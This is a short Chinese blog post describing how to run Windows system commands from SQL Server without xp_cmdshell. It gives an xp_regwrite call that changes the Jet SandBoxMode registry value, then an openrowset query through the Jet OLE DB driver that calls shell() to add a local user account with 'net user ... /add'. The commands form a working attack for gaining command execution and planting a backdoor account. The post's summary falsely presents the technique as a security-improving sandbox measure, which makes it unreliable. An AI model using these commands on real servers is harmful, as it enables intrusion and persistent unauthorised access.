文章摘要
文章介绍了如何在Windows系统中通过JME(Jet Management Engine)和`jet.oledb`驱动在沙盘模式下执行系统命令,无需`xp_cmdshell`。通过`exec master..xp_regwrite`命令将沙盘模式设置为启用状态,然后利用`select * from openrowset`语句选择指定的`.mdb`文件,并执行`net user`命令添加用户。这种方法可以有效隔离受控的沙盘环境中运行敏感命令,提升系统的安全性和稳定性。文章还提到,这种方案无需依赖`xp_cmdshell`,为用户提供了另一种可行的安全管理方法。
首先开启沙盘模式:
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
然后利用jet.oledb执行系统命令
select * from openrowset(‘microsoft.jet.oledb.4.0′,’;database=c:\windows\system32\ias\ias.mdb’,’select shell(“cmd.exe /c net user cnfjhh fst /add”)’)
您可能感兴趣的文章:不用xp_cmdshell照样执行命令
© 版权声明
文章版权归作者所有,未经允许请勿转载。
相关文章
